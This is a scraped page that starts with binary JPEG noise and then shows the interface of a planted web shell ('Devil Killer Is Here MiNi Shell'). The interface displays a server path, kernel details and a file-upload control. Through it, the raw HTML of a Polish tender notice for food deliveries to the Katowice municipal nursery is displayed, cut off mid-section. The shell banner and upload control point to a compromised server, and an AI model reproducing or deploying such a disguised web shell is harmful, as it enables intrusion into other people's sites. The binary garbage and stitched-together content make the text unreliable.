JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211123/0027983101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa żywności do Oddziałów Żłobka Miejskiego w Katowicach w pierwszym półroczu 2022 r. z podziałem na 6 zadań. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Żłobek Miejski w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270236733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokolska 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-086</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324962957</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zlobek.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zlobek.katowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa żywności do Oddziałów Żłobka Miejskiego w Katowicach w pierwszym półroczu 2022 r. z podziałem na 6 zadań. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d04486b6-493c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00279831</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006213/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa żywności do Oddziałów Żłobka Miejskiego w Katowicach w pierwszym półroczu 2022 r. z podziałem na 6 zadań-Iczęść</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl; http://www.bip.zlobek.katowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu mini Portalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. ). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email zamowienia@zlobek.katowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych:. pdf., doc.,docx., rtf., xps., odt. i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Wykonawca w celu poprawnego zaszyfrowania oferty powinien mieć zainstalowany na komputerze.NETFramework4.5. Aplikacja działa na platformie Windows (VistaSP2,7,8,10) Aplikacja nie jestdostępna dla systemu Linux i MACOS. Sposób zaszyfrowania oferty opisany został w Instrukcji<br/>użytkownika dostępnej na miniPortalu. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>Jeżeli na ofertę składa się kilka dokumentów, Wykonawca powinien stworzyć folder, do którego przeniesie wszystkie dokumenty oferty podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Następnie z tego folderu Wykonawca zrobi folder.zip (bez<br/>nadawania mu haseł i bez szyfrowania) W kolejnym kroku za pośrednictwem Aplikacji do szyfrowania .Wykonawca zaszyfruje folder zawierający dokumenty składające się na ofertę. Wykonawca może złożyć tylko jedną ofertę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Obowiązek informacyjny w stosunku do osób fizycznych będących dostawcami lub osób działających z upoważnienia dostawców Administratora.Zgodnie z art. 13 i 14 ogólnego rozporządzenia o ochronie danych (dalej: RODO) informujemy, że:Administratorem Pani/Pana danych osobowych jest Żłobek Miejski w Katowicach z siedzibą przy ul. Sokolskiej 26, 40 -086 Katowice, będący jednostką organizacyjną miasta Katowice prowadzącą gospodarkę finansową na zasadach jednostki budżetowej, www.zlobek.katowice.pl.Dane kontaktowe inspektora ochrony danych:inspektor.ochrony.danych@zlobek.katowice.pl Celami przetwarzania danych osobowych są: zawarcie i wykonanie umów łączących strony – podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. b) RODO (dotyczy sytuacji, kiedy osoby, których dane dotyczą są stronami umów albo Administrator podejmuje działania z inicjatywy tych osób w celu ich zawarcia w szczególności w związku z konkursami ofert lub postępowaniami przetargowymi); wykonanie obowiązków prawnych ciążących na Administratorze – podstawa prawna to art. 6 ust. 1 lit. c) RODO, w szczególności związanego z obowiązkiem przechowywania dokumentacji księgowej wynikającego z ustawy o rachunkowości; realizacja innych celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratora na podstawie art. 6 ust. 1 lit. f) RODO takich jak:realizacja umowy, w przypadku, nie jest Pani/Pan stroną umowy, ale działa Pani/Pan z upoważnienia strony umowy,marketing bezpośredni,ustalanie, obrona i dochodzenie roszczeń,tworzenie statystyk, analiz i zestawień na potrzeby Administratora.Kategorie odnośnych danych osobowych, które mogą być przetwarzane w związku z umową i w celu jej sprawnej realizacji przez osoby działające z upoważnienia strony umowy takie jak: imię, nazwisko, stanowisko, zakres kompetencji, zakres upoważnienia określonego przez stronę umowy oraz dane kontaktowe takie jak nr telefonów i adresy mailowe, a w przypadkach konieczności identyfikacji uprawnień konkretnej osoby również nr PESEL albo nr dowodu tożsamości. Odbiorcami Pani/Pana danych osobowych mogą być: Poczta Polska, firmy kurierskie lub transportowe,firmy ubezpieczeniowe, firmy zapewniające wsparcie IT dla Administratora, partnerzy handlowi Administratora, biuro rachunkowe, firmy windykacyjne, a także banki. Ponadto w zakresie określonym przez przepisy prawa odbiorcami Pani/Pana danych osobowych mogą być również pozostali oferenci oraz osoby odwiedzające Biuletyn Informacji Publicznej Administratora. Administrator danych nie zamierza przekazywać danych osobowych, które Pani/Pana dotyczą do państw trzecich oraz organizacji międzynarodowych. Okres, przez który dane osobowe będą przechowywane: w zakresie zawartej umowy, przez okres do czasu zakończenia jej realizacji, a po tym czasie przez okres wymagany przez przepisy prawa lub do przedawnienia roszczeń.8. Ma Pani/Pan prawo do:a) żądania od Administratora dostępu do swoich danych osobowych,sprostowania swoich danych osobowych,żądania od<br/>Administratora usunięcia lub ograniczenia przetwarzania swoich danych osobowych, jeżeli Administrator nie ma uzasadnionych prawnie podstaw do ich dalszego przetwarzania,wniesienia sprzeciwu wobec przetwarzania,przenoszenia swoich danych,wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. Podanie danych jest warunkiem zawarcia umowy, konsekwencją niepodania danych jest brak możliwości jej zawarcia lub realizacji.W oparciu o dane, które Pani/Pana dotyczą Administrator nie będzie podejmował decyzji w sposób zautomatyzowany, nie będą one także poddawane profilowaniu na zasadach określonych w art. 22 RODO.Źródłem, z którego Administrator otrzymuje Pani/Pana dane osobowe do celów kontaktowych niezbędnych do realizacji umów, w przypadkach, w<br/>których nie otrzymaliśmy ich od Pani/Pana, są strony umów lub osoby przez nie upoważnione do ich przekazania w celu realizacji tych umów.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.26.4.2021.MR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1	Dostawa warzyw i owoców świeżych<br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wyni-kających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu robo-czym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03222100-4 - Owoce i orzechy tropikalne</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <p class="mb-0">15320000-7 - Soki owocowe i warzywne</p> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15331000-7 - Warzywa przetworzone</p> <p class="mb-0">15331110-1 - Przetworzone warzywa korzeniowe</p> <p class="mb-0">15331130-7 - Fasola, groch, papryki, pomidory i pozostałe warzywa</p> <p class="mb-0">15331140-0 - Warzywa liściaste i kapustne</p> <p class="mb-0">15331400-1 - Warzywa konserwowane i/lub puszkowane</p> <p class="mb-0">15331425-2 - Przecier pomidorowy</p> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <p class="mb-0">15332270-7 - Przeciery owocowe</p> <p class="mb-0">15332290-3 - Dżemy</p> <p class="mb-0">15332400-8 - Owoce konserwowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)”, dokonana zostanie na podstawie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się następująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podstawie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3	Dostawa mięsa i produktów mięsnych<br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wynikających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <p class="mb-0">15110000-2 - Mięso</p> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15113000-3 - Wieprzowina</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z 